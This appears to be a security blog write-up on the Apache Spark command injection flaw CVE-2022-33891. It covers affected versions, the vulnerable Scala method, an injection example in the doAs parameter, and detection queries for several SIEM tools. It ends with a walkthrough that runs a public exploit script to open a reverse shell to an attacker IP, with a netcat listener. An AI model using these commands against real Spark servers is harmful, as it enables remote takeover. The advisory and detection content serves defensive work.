Apache Zero Days — Apache Spark Command Injection Vulnerability (CVE-2022–33891)

vsociety

7 min readApr 27, 2024

by Mudassar Zafar

Component Name:

Apache Spark

Affected Versions:

Apache Spark ≤3.0.3

3.1.1≤ Apache Spark ≤3.1.2

3.2.0≤ Apache Spark ≤3.2.1

Vulnerability Type:

Command Injection

CVSSv3:

Base Score: 8.8 (High)

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

User Interaction: None

Confidentiality Impact: High

Integrity Impact: High

Availability Impact: High

Remediation Solutions:

Check the Component Version:

Run spark-shell command. The version information will be displayed.

Apache Solution

Users can update their affected products to the latest version to fix the vulnerability:

https://spark.apache.org/downloads.html

How does it work?

The command injection occurs because Spark checks the group membership of the user passed in the ?doAs parameter by using a raw Linux command.

User commands are processed through ?doAs parameter and nothing reflected back on the page during command execution, so this is blind OS injection. Your commands run, but there will be no indication if they worked or not or even if the program you’re running is on target.

OS commands that are passed on the URL parameters?doAs will trigger the background Linux bash process which calls cmdseq will run the process with the command line id -Gn .Running of bash with id -Gn is a good sign of indicator that your server is vulnerable or it is already compromised.

If an attacker is sending reverse shell commands. There is also a high chance of granting apache spark server access to the attackers’ machine.

private def getUnixGroups(username: String): Set[String] = {
val cmdSeq = Seq("bash", "-c", "id -Gn " + username)
// we need to get rid of the trailing "\n" from the result of command execution
Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
Utils.executeAndGetOutput(idPath :: "-Gn" :: username :: Nil).stripLineEnd.split(" ").toSet
}}

Vulnerable source code: https://github.com/apache/spark/pull/36315/files#diff-96652ee6dcef30babdeff0aed66ced6839364ea4b22b7b5fdbedc82eb655eeb5L41

The command injection occurs because Spark checks the group membership of the user passed in the ?doAs parameter by using a raw Linux command.

Vulnerable component

http://<IP_address>/?doAs=`[command injection here]`

User commands are processed through ?doAs parameter and nothing reflected back on the page during command execution, so this is blind OS injection. Your commands run, but there will be no indication if they worked or not or even if the program you’re running is on target.

Vulnerable Method:

private def getUnixGroups(username: String): Set[String] = {
    val cmdSeq = Seq("bash", "-c", "id -Gn " + username)
    // we need to get rid of the trailing "\n" from the result of command execution
    Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
    Utils.executeAndGetOutput(idPath ::  "-Gn" :: username :: Nil).stripLineEnd.split(" ").toSet
  }
}

This is a method definition in Scala for a private method named getUnixGroups. This method takes a single String argument called username and returns a Set of Strings that represent the groups that the user belongs to on a Unix-like system.

The method first constructs a Seq of Strings that represents a shell command to retrieve the user’s group information using the id command. The cmdSeq variable is set to this sequence, with the username parameter concatenated to the end of the command using string concatenation.

Next, the executeAndGetOutput method of the Utils object is called with cmdSeq as its argument. This method executes the shell command represented by the cmdSeq sequence and returns the output of the command as a string.

The output of the executeAndGetOutput method is then processed to remove the trailing newline character using the stripLineEnd method. The resulting string is then split into an array of strings using the split method and converted into a Set using the toSet method. This Set of strings represents the user’s group membership.

val cmdSeq = Seq("bash", "-c", "id -Gn " + username)

The getUnixGroups method constructs a shell command by concatenating the username parameter with the id command. The username parameter is not properly sanitized or validated, which means that an attacker could potentially inject malicious code into it and execute arbitrary commands on the underlying operating system.

For example, if an attacker were to supply a username parameter of “; echo hacked > /tmp/hacked”, the resulting shell command would be “id -Gn ; echo hacked > /tmp/hacked”. When this command is executed by the executeAndGetOutput method, it would execute the id command and then execute the echo command, which writes the string “hacked” to the file /tmp/hacked. This would give the attacker arbitrary code execution on the underlying operating system.

In current scenario we can see that OS commands that are passed on the URL parameters ?doAs will trigger the background Linux bash process which calls cmdseq will run the process with the command line id -Gn. Running of bash with id -Gn is a good sign of indicator that your server is vulnerable or it is already compromised.

If an attacker is sending reverse shell commands. There is also a high chance of granting Apache spark server access to the attackers’ machine.

Detection & Response:

This can allow the attacker to reach a permission check function that builds a Unix shell command based on their input, which is then executed by the system. This can result in arbitrary shell command execution with the privileges of the Spark process, potentially leading to complete compromise of the affected system.

The Apache Spark command injection vulnerability (CVE-2022–33891) is a serious security issue that can allow an attacker to execute arbitrary code with the privileges of the Spark process, potentially leading to complete compromise of the affected system. It is important for organizations using Apache Spark to be aware of this vulnerability and take steps to detect and respond to it.

One way to detect the vulnerability is to monitor for suspicious activity on the affected system. This can include monitoring for unexpected system or network behavior, such as unusual network traffic or system resource usage. It can also include monitoring for malicious activity, such as attempts to execute unauthorized code or access restricted resources.

Another way to detect the vulnerability is to use security tools and technologies, such as intrusion detection systems (IDS) and vulnerability scanners, to identify potential vulnerabilities and security issues on the system. These tools can help to identify and alert on potential security threats, allowing organizations to take appropriate action to mitigate the risk.

Once the vulnerability has been detected, it is important to take swift action to respond to the issue. This may include isolating the affected system to prevent further compromise, implementing temporary fixes or workarounds, and deploying a patch or update to address the issue. It is also important to conduct a thorough investigation to determine the root cause of the vulnerability and implement measures to prevent similar issues from occurring in the future.

Splunk:

index=* c-uri="*?doAs=`*"
index=* (Image="*\\bash" AND (CommandLine="*id -Gn*"))

Qradar:

SELECT UTF8(payload) from events where LOGSOURCENAME(logsourceid) ilike '%Linux%' and "Image" ilike '%\bash' and ("Process CommandLine" ilike '%id -Gn%')

SELECT UTF8(payload) from events where "URL" ilike '%?doAs=`%'

Elastic Query:

url.original:*?doAs\=`*
(process.executable:*\\bash AND process.command_line:*id\ \-Gn*)

Carbon Black:

(process_name:*\\bash AND process_cmdline:*id\ \-Gn*)

FireEye:

(process:`*\bash` args:`id -Gn`)

GrayLog:

(Image.keyword:*\\bash AND CommandLine.keyword:*id\ \-Gn*)
c-uri.keyword:*?doAs=`*

RSA Netwitness:

(web.page contains '?doAs=`')
((Image contains 'bash') && (CommandLine contains 'id -Gn'))

Logpoint:

(Image="*\\bash" CommandLine IN "*id -Gn*")
c-uri="*?doAs=`*"

Technical Detail:

First you need to clone exploit python script from github repository into your local machine using below command.

                  ```
git clone https://github.com/devengpk/Apache-zero-days.git
                  ```

Apache Spark server is ready to test if this self hosted server is vulnerable or not

Now, let’s check if this target is vulnerable or not using below mentioned command

```
python3 exploit.py -u http://<server-ip> -p 8080 --check --verbose
```

From the above commands result, we found that the searched target is vulnerable.

Now let’s use our exploit to get the reverse shell by using the below command.

```
python3 exploit.py -u http://<Server-IP> -p 8080 --revshell -lh <Attacker-IP> -lp 9001 --verbose
```

Before starting the reverse shell, let’s start netcat listener to capture traffic for reverse shell using below mentioned command.

```
nc -nvlp 9001
```

After executing netcat command, execute the above mentioned reverse shell command and you will successfully got reverse shell and can execute all your desired commands on the target server.

Reference:

● Exploitation payload: https://github.com/devengpk/Apache-zero-days● Vulnerable source code: https://github.com/apache/spark/pull/36315/files#diff-96652ee6dcef30babdeff0aed66ced6839364ea4b22b7b5fdbedc82eb655eeb5L41

#Apache #Apache_Spark #CVE-2022–33891

The Apache Spark command injection vulnerability (CVE-2022–33891) was discovered by the Sangfor FarSight Labs team and reported to the Apache Spark project team on July 18, 2022. The vulnerability was classified as high severity, with a CVSS (Common Vulnerability Scaling System) Base Score of 8.8, indicating a high potential impact.